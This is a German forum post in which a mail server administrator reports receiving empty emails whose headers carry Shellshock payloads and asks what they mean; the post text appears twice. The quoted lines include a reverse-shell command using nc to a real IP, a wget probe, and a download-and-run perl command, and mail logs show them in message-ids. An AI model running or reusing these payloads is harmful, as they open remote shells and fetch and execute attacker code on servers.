UserofSeven
New Member
Hallo zusammen,
ich habe kürzlich einen Server (u. a. Mailserver) in Betrieb genommen, der mit Plesk unter Debian 7 läuft. Es handelt sich um einen vServer bei Strato.
Seit einigen Tagen nun nehmen die gängigen Angriffsversuche (Testen verschiedenster Mail-Adressen, Login-Daten für den SMTP-Server, ausprobieren gängiger Webadresse für z. B. phpmyadmin, ...) wieder zu, was bei öffentlich erreichbaren Servern ja prinzipiell keine Seltenheit ist. Da es nicht mein erster Server ist nehme ich das hin und begleite das insbesondere die erste Zeit mit verstärktem Überprüfen der Log-Daten.
...Bis ich dann heute mittag drei sehr fragwürdige Mail auf eines meiner Mail-Konten erhielt.
Alle waren ohne Inhalt, hatten aber als Absender, Empfänger, CC, Betreff, Datum usw. folgende Zeilen:
oder
oder
Daraufhin habe ich im Log-File nachgesehen und habe folgendes Schema vorgefunden (für alle Mails ähnlich):
Das sieht für mich danach aus, als wenn es möglich war, über mein Server-Relay zu senden. Warum dann aber gerade mit diesem Inhalt und an mich und nicht gleich ins Internet? Und ich frage mich natürlich, wie das dann überhaupt möglich war, denn wie gesagt, alle anderen Zugriffe sind ins leere gelaufen (Authentifizierung fehlgeschlagen) und wurden nach nur wenigen Versuchen schon von Fail2Ban geblockt. Die Passwörter sind individuell zufallsgeneriert und dürften relativ sicher sein.
Zumindest dürfte der Server nicht kompromittiert sein, denn laut den anderen Logs waren die Zugriffsversuche z. B. auf SSH nicht erfolgreich. Die Mails aber verstehe ich trotzdem nicht.
Hat jemand von euch eine Idee, was das sein könnte? Ich zumindest habe so etwas noch nicht erlebt...
Danke und viele Grüße,
UserofSeven
ich habe kürzlich einen Server (u. a. Mailserver) in Betrieb genommen, der mit Plesk unter Debian 7 läuft. Es handelt sich um einen vServer bei Strato.
Seit einigen Tagen nun nehmen die gängigen Angriffsversuche (Testen verschiedenster Mail-Adressen, Login-Daten für den SMTP-Server, ausprobieren gängiger Webadresse für z. B. phpmyadmin, ...) wieder zu, was bei öffentlich erreichbaren Servern ja prinzipiell keine Seltenheit ist. Da es nicht mein erster Server ist nehme ich das hin und begleite das insbesondere die erste Zeit mit verstärktem Überprüfen der Log-Daten.
...Bis ich dann heute mittag drei sehr fragwürdige Mail auf eines meiner Mail-Konten erhielt.
Alle waren ohne Inhalt, hatten aber als Absender, Empfänger, CC, Betreff, Datum usw. folgende Zeilen:
Code:
() { :; }; nc -e /bin/sh 185.10.58.181 25;
Code:
() { :; }; wget 185.10.58.181/VULNERABLE;
Code:
() { :; }; wget 91.184.21.251/e.txt -O /tmp/e.txt;perl /tmp/e.txt 185.10.58.181 443;Daraufhin habe ich im Log-File nachgesehen und habe folgendes Schema vorgefunden (für alle Mails ähnlich):
Code:
postfix/smtpd[11561]: connect from u16850951.onlinehome-server.com[74.208.184.251]
postfix/smtpd[11561]: 20B61F7E117D: client=u16850951.onlinehome-server.com[74.208.184.251]
/usr/lib/plesk-9.0/psa-pc-remote[1819]: Unable to get sender domain by sender mailname
postfix/cleanup[11565]: 20B61F7E117D: message-id=() { :; }; wget 185.10.58.181/VULNERABLE;
/usr/lib/plesk-9.0/psa-pc-remote[1819]: handlers_stderr: SKIP
/usr/lib/plesk-9.0/psa-pc-remote[1819]: SKIP during call 'check-quota' handler
postfix/qmgr[25586]: 20B61F7E117D: from=<support@mata.com>, size=783, nrcpt=1 (queue active)
postfix/cleanup[11565]: 77198F7E13DF: message-id=() { :; }; wget 185.10.58.181/VULNERABLE;
postfix/qmgr[25586]: 77198F7E13DF: from=<support@mata.com>, size=903, nrcpt=1 (queue active)
postfix/local[11567]: 20B61F7E117D: to=<root@localhost.localdomain>, orig_to=<root>, relay=local, delay=0.51, delays=0.49/0.01/0/0.01, dsn=2.0.0, status=sent (forwarded as 77198F7E13DF)
postfix/qmgr[25586]: 20B61F7E117D: removed
postfix-local[11569]: postfix-local: from=support@mata.com, to=<meine_Mail_Adr>, dirname=/var/qmail/mailnames
<. . .>
postfix-local[11569]: handlers_stderr: PASS
postfix-local[11569]: PASS during call 'spam' handler
postfix/smtpd[11561]: disconnect from u16850951.onlinehome-server.com[74.208.184.251]
dovecot: service=lda, user=<meine_Mail_Adr>, ip=[]. msgid=() { :; }; wget 185.10.58.181/VULNERABLE;: saved mail to INBOX
postfix/pipe[11568]: 77198F7E13DF: to=<<meine_Mail_Adr>>, orig_to=<root>, relay=plesk_virtual, delay=0.24, delays=0.01/0.01/0/0.22, dsn=2.0.0, status=sent (delivered via plesk_virtual service)
postfix/qmgr[25586]: 77198F7E13DF: removedDas sieht für mich danach aus, als wenn es möglich war, über mein Server-Relay zu senden. Warum dann aber gerade mit diesem Inhalt und an mich und nicht gleich ins Internet? Und ich frage mich natürlich, wie das dann überhaupt möglich war, denn wie gesagt, alle anderen Zugriffe sind ins leere gelaufen (Authentifizierung fehlgeschlagen) und wurden nach nur wenigen Versuchen schon von Fail2Ban geblockt. Die Passwörter sind individuell zufallsgeneriert und dürften relativ sicher sein.
Zumindest dürfte der Server nicht kompromittiert sein, denn laut den anderen Logs waren die Zugriffsversuche z. B. auf SSH nicht erfolgreich. Die Mails aber verstehe ich trotzdem nicht.
Hat jemand von euch eine Idee, was das sein könnte? Ich zumindest habe so etwas noch nicht erlebt...
Danke und viele Grüße,
UserofSeven
